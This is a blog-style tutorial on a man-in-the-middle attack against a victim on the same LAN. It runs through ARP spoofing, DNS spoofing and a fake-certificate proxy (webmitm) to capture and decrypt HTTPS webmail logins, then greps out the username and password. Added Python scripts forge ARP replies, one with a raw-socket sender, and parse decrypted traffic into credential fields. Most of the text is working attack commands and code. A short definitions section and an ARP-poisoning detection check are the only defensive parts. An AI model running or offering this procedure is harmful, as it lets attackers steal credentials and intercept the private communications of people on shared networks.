Tuesday, September 4, 2012

Accessing SSL encrypted traffic (MITM attack with Backtrack 5)


Step 1: First you need to set up IP forwarding, so that the packets the victim sends to the attacker's machine are passed on to the real gateway instead of being dropped. Open a terminal and type the command.

Command: fragrouter -B1

The -B1 ("base-1") mode is plain forwarding: packets are sent on unmodified. Enabling forwarding in the kernel through the ip_forward sysctl does the same job; fragrouter is used here simply because it is already on Backtrack. This keeps the connection working for the client while you are spoofing, which is what stops the victim from noticing the attack. Minimize the terminal.

Step 2: Now you need to ARP spoof the client. Open a new terminal and type the command.

Command: arpspoof -t [target ip] [default gateway ip]

example : arpspoof -t 192.168.1.7 192.168.1.1

This sends the target forged ARP replies claiming that the gateway's IP address belongs to the attacker's MAC address, so everything the client sends towards the gateway (including its DNS queries) now arrives at the attacker first. Note that this form only poisons the client, not the gateway: replies from the gateway still reach the client directly. That is enough for this attack, because the spoofed DNS answer in the next step makes the client open its HTTPS connections straight to the attacker's IP. Use -i to pick the interface if the machine has more than one, and stop arpspoof with Ctrl-C, which makes it send the correct ARP entries again before exiting. Minimize the terminal.

Step 3: Now you need to set up DNS spoofing. Open a new terminal and type the command.

Command: dnsspoof

Minimize the terminal.

dnsspoof sniffs the DNS queries that now pass through the attacker's machine and answers them with forged replies. Without a hosts file (-f) it answers every address (A) query with the attacker's own IP, so from now on every hostname the client looks up resolves to the MITM. The forged reply normally wins the race against the real DNS server because the attacker is on the same LAN as the client.

Step 4: Now you need a proxy for the web connections the client will open to the attacker's IP because of the spoofed DNS answers. Open a new terminal and type the command.

Command: webmitm -d

NOTE: If you are starting webmitm for the first time, it runs openssl to create a self-signed certificate and private key, which it writes to webmitm.crt in the current directory. Answer the questions it asks with false information and you should get the message "webmitm relaying transparently". webmitm then accepts the client's HTTP and HTTPS connections, presents its own certificate for HTTPS, and relays the requests to the real server, so the client still gets the real page. The -d switch turns on verbose debugging output. Minimize the terminal.

Step 5: Now you need to capture the traffic using Wireshark.

Command: Applications -> BackTrack -> Information Gathering -> Network Analysis -> Network Traffic Analysis -> wireshark

Step 6: In Wireshark select:

Command: Capture -> Interfaces -> Start (click the Start button for eth0)

Start the capture before the client connects: ssldump can only decrypt a session whose complete handshake is in the capture file.

The DNS has been spoofed, so an nslookup for Gmail on the client computer now returns the MITM attacker's IP:

When the client accesses Gmail, the following happens:

1. The client opens "gmail.com" in a browser.
2. The spoofed DNS answer sends the connection to webmitm, which relays the real Gmail page but presents its fake SSL certificate. The browser shows a certificate warning (the certificate is self-signed and not issued for the site); the attack only continues if the client accepts it.
3. The client logs into Gmail with his credentials.
4. All the traffic, including the SSL handshake and the encrypted login, is captured by Wireshark.


Step 7: Stop the Wireshark capture and save the captured traffic to a file. Save it in the root folder (the directory where webmitm was started) to make it easier, and use the classic libpcap (pcap) format, which is what ssldump reads.

In the root folder there will be another file called "webmitm.crt". Despite the name, it holds both the fake SSL certificate and its private key (webmitm generates them together), and it is the private key that makes the decryption in the next step possible.

Now you have the captured SSL packets from the network traffic and the fake SSL certificate with its key.


Step 8: Now you need to decrypt the captured packets. Open a new terminal and type the command.

Command: ssldump -r test -k webmitm.crt -d > finaloutput

NOTE:
• test is the file containing the packets captured with Wireshark
• webmitm.crt is the fake SSL certificate file, which also contains the private key ssldump needs
• finaloutput is the file that will contain the decrypted output (-d tells ssldump to print the decrypted application data)

This works because the session between the client and webmitm uses RSA key exchange: the client encrypts the session secret to the certificate's public key, so whoever holds the matching private key can recover it from the capture. Sessions negotiated with a forward-secret (DHE/ECDHE) cipher suite cannot be decrypted this way, even with the key.


Step 9: Now you can view the decrypted packets. Open a new terminal and type the command.

Command: cat finaloutput | grep Email

The decrypted output is plain text, so the POST request that carried the login form can be found by searching for the name of its form field. The matching line contains the decrypted username and password.
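A step beyond grep, as an added example (this is not code from the original post and not part of ssldump): a small Python parser for the decrypted application_data records that ssldump -d prints. It keeps only the client-to-server HTTP requests and URL-decodes a urlencoded login POST into a dictionary of fields, so the credentials come out as values rather than as a line to eyeball. The sample text inside it is constructed for this example and modelled on ssldump's output layout; the host, path and credentials in it are fake.

```python
"""Extract submitted form fields from the text that `ssldump -d` writes.

Added example, not code from the original post and not part of ssldump.
It parses the decrypted application_data records of an ssldump text dump,
keeps the client-to-server HTTP requests and URL-decodes POST form bodies,
so a login such as Email=...&Passwd=... becomes a dict rather than a line
to grep for. SAMPLE_SSLDUMP is constructed for this example and modelled
on ssldump's layout; host, path and credentials in it are fake.
"""
import re
from urllib.parse import parse_qs

# "<conn> <rec>  <time> (<delta>)  C>S|S>C  <record type>"
RECORD_RE = re.compile(r"^(\d+)\s+\d+\s+[\d.]+\s+\([\d.]+\)\s+(C>S|S>C)\s+(\S+)")

SAMPLE_SSLDUMP = """\
New TCP connection #1: 192.168.1.7(49213) <-> 192.168.1.5(443)
1 1  0.0012 (0.0012)  C>S  Handshake
      ClientHello
1 2  0.0301 (0.0289)  S>C  Handshake
      ServerHello
      Certificate
      ServerHelloDone
1 3  0.0405 (0.0104)  C>S  Handshake
      ClientKeyExchange
1 4  0.0906 (0.0501)  S>C  Handshake
      Finished
1 5  0.2010 (0.1104)  C>S  application_data
    ---------------------------------------------------------------
    POST /login HTTP/1.1
    Host: webmail.example.com
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 63

    Email=victim%40example.com&Passwd=Sup3r%26secret&signIn=Sign+in
    ---------------------------------------------------------------
1 6  0.3100 (0.1090)  S>C  application_data
    ---------------------------------------------------------------
    HTTP/1.1 302 Found
    Location: https://webmail.example.com/inbox
    ---------------------------------------------------------------
1 7  0.4000 (0.0900)  C>S  Alert
"""


def app_data_records(text):
    """Yield (conn_id, direction, payload_lines) for every decrypted application_data block."""
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        m = RECORD_RE.match(lines[i])
        i += 1
        if not m or m.group(3) != "application_data":
            continue
        conn, direction = int(m.group(1)), m.group(2)
        # ssldump -d frames each payload between two dashed lines, indented by four spaces
        if i < len(lines) and lines[i].strip().startswith("----"):
            i += 1
            payload = []
            while i < len(lines) and not lines[i].strip().startswith("----"):
                line = lines[i][4:] if lines[i].startswith("    ") else lines[i]
                payload.append(line.rstrip("\r"))   # HTTP lines end in CRLF
                i += 1
            i += 1  # skip the closing dashed line
            yield conn, direction, payload


def parse_http_request(payload):
    """Return (method, path, headers, body) for an HTTP request payload, else None."""
    if not payload:
        return None
    parts = payload[0].split()
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None  # a response line or non-HTTP data
    method, path = parts[0], parts[1]
    headers, idx = {}, 1
    while idx < len(payload) and payload[idx]:
        name, _, value = payload[idx].partition(":")
        headers[name.strip().lower()] = value.strip()
        idx += 1
    body = "\n".join(payload[idx + 1:]).strip()  # everything after the blank line
    return method, path, headers, body


CREDENTIAL_WORDS = ("email", "user", "login", "pass")


def extract_form_submissions(text):
    """One dict per client POST whose urlencoded form carries a credential-looking field."""
    found = []
    for conn, direction, payload in app_data_records(text):
        if direction != "C>S":
            continue  # server responses are not what we are after
        req = parse_http_request(payload)
        if req is None:
            continue
        method, path, headers, body = req
        if method != "POST" or "x-www-form-urlencoded" not in headers.get("content-type", ""):
            continue
        fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
        if any(w in k.lower() for k in fields for w in CREDENTIAL_WORDS):
            found.append({"conn": conn, "host": headers.get("host", "?"), "path": path, "fields": fields})
    return found


if __name__ == "__main__":
    for s in extract_form_submissions(SAMPLE_SSLDUMP):
        print(f"conn {s['conn']}: POST https://{s['host']}{s['path']} -> {s['fields']}")
```

Feed it the real file by replacing SAMPLE_SSLDUMP with the contents of finaloutput. The direction filter matters: the same dump also contains the server's decrypted responses (set-cookie headers, redirects), which are interesting on their own but are not what the grep in Step 9 was looking for.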



Definitions & Tools:

1.) SSL :
Secure Sockets Layer (today TLS) is a protocol that protects data sent over the Internet with encryption. The server proves its identity with a certificate that carries its public key, and the client uses that key to agree on a session key with the server; the rest of the conversation is encrypted with that session key. An attacker sniffing the traffic between them only sees encrypted data. Web servers that use SSL are reached over HTTPS. The attack on this page works only because the client accepts a certificate that is not the real server's.

2.) ARP :
Address Resolution Protocol is a link-layer protocol used to map an IP address to a physical address such as an Ethernet (MAC) address. A host wishing to obtain a physical address broadcasts an ARP request on the local network. The host that has the IP address in the request replies with its hardware address, and the requester caches the answer. ARP has no authentication at all, which is what the next definitions exploit.

3.) DNS :
Domain Name System is a distributed database that translates a domain name into an IP address. For example, if you type gmail.com in your browser, your DNS server replies with Gmail's IP so that your computer can connect to Gmail's server. For a better understanding, type "nslookup" in your cmd or konsole and then "gmail.com": you will see your DNS server reply with Gmail's IP addresses.

4.) ARP Spoofing :
ARP spoofing is a technique in which a host on a LAN "poisons" the ARP cache of another host by sending forged ARP replies (or requests), causing it to send packets to the wrong MAC address. Hosts accept such replies even when they never asked for them, so the attacker can make the victim send everything destined for the gateway through the attacker's machine, which can then sniff or modify the frames.
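What arpspoof actually puts on the wire in Step 2, as an added example (this is not code from the original post or from dsniff/arpspoof): the script builds the raw Ethernet/ARP frame of an unsolicited ARP reply that tells the victim the gateway's IP "is-at" the attacker's MAC, decodes it again, and adds the check a host or monitor would use to notice the poisoning. The IP and MAC addresses are made up for the example; send_frame() is a Linux raw-socket helper that needs root and is never called unless you call it yourself.

```python
"""Build, decode and spot the forged ARP reply that arpspoof sends.

Added example: not code from the original post or from dsniff/arpspoof.
`arpspoof -t <victim> <gateway>` repeatedly sends the victim an unsolicited
ARP reply saying "<gateway IP> is-at <attacker MAC>"; the victim caches it
and starts sending gateway-bound frames to the attacker. The addresses
below are made up for the example. send_frame() needs Linux and root and
is never called unless you call it yourself.
"""
import socket
import struct

ETH_P_ARP = 0x0806
ARP_REPLY = 2
ARP_FMT = "!HHBBH6s4s6s4s"   # htype, ptype, hlen, plen, op, sha, spa, tha, tpa

# Constructed example addresses (not from the original page).
VICTIM_IP, VICTIM_MAC = "192.168.1.7", "00:11:22:33:44:07"
GATEWAY_IP, GATEWAY_MAC = "192.168.1.1", "00:11:22:33:44:01"
ATTACKER_MAC = "00:11:22:33:44:99"


def mac_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def build_arp_reply(target_ip, target_mac, claimed_ip, claimed_mac):
    """Ethernet II frame to target_mac carrying 'claimed_ip is-at claimed_mac'."""
    eth = struct.pack("!6s6sH", mac_bytes(target_mac), mac_bytes(claimed_mac), ETH_P_ARP)
    arp = struct.pack(
        ARP_FMT,
        1, 0x0800, 6, 4,            # Ethernet / IPv4 / 6-byte MAC / 4-byte IP
        ARP_REPLY,
        mac_bytes(claimed_mac), socket.inet_aton(claimed_ip),   # sender: the lie
        mac_bytes(target_mac), socket.inet_aton(target_ip),     # target: the victim
    )
    return eth + arp


def parse_arp(frame):
    """Decode an Ethernet/ARP frame into a dict; raises ValueError if it is not ARP."""
    _dst, _src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    _, _, _, _, op, sha, spa, tha, tpa = struct.unpack(ARP_FMT, frame[14:42])
    return {
        "op": "reply" if op == ARP_REPLY else "request",
        "sender_mac": mac_str(sha), "sender_ip": socket.inet_ntoa(spa),
        "target_mac": mac_str(tha), "target_ip": socket.inet_ntoa(tpa),
    }


def is_poisoning(frame, known):
    """True if an ARP reply claims an IP in `known` (ip -> mac) with a different MAC.

    This is the check a static ARP entry or an arpwatch-style monitor performs:
    a changed MAC for a known IP, above all the gateway, is the spoofing signal.
    """
    a = parse_arp(frame)
    return a["op"] == "reply" and known.get(a["sender_ip"], a["sender_mac"]) != a["sender_mac"]


def send_frame(frame, iface):
    """Put a raw frame on the wire (Linux AF_PACKET, needs root). Not called here."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ARP)) as s:
        s.bind((iface, 0))
        s.send(frame)


if __name__ == "__main__":
    frame = build_arp_reply(VICTIM_IP, VICTIM_MAC, GATEWAY_IP, ATTACKER_MAC)
    print(len(frame), "byte frame:", parse_arp(frame))
    print("poisoning seen by a host that knows the real gateway MAC:",
          is_poisoning(frame, {GATEWAY_IP: GATEWAY_MAC}))
```

The frame is addressed to the victim's MAC only, which is why the rest of the LAN (and the gateway) does not see the lie; arpspoof keeps resending it every couple of seconds so the poisoned entry never ages out. The same asymmetry is what is_poisoning() relies on: a host that pins the gateway's real MAC, or a monitor that records first-seen pairs, catches the change immediately.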

5.) DNS Spoofing :
DNS spoofing is the DNS counterpart of ARP spoofing: the attacker answers the victim's DNS requests with false DNS information, forcing the victim to connect to a site (here, the attacker's proxy) that is not the real one.

6.) MITM :
A man-in-the-middle attack means intercepting a communication between two systems while both keep believing they are talking to each other directly. ARP spoofing and DNS spoofing are the techniques used here to get into the middle; webmitm is the middle.

7.) IP forwarding :
IP forwarding lets a host pass on IP packets that are not addressed to itself, which is what a router or gateway does. Here the attacker's machine, which sits on the same LAN as the victim, forwards the victim's packets to the real gateway so the victim keeps its connectivity while being spoofed.


Tools :-

1.) fragrouter - used here for IP forwarding between the victim and its real gateway.

2.) arpspoof - poisons the victim's ARP cache so that its traffic for the gateway comes to the attacker.

3.) dnsspoof - answers the victim's DNS queries with the attacker's IP.

4.) webmitm - transparently proxies and sniffs the HTTP / HTTPS traffic redirected by dnsspoof, capturing most "secure" SSL-encrypted webmail logins and form submissions.

5.) wireshark - a network protocol analyzer. Here it is used to capture the SSL-encrypted traffic between the victim and webmitm.

6.) ssldump - decodes captured SSL sessions and decrypts them when given the server's private key (RSA key exchange only).


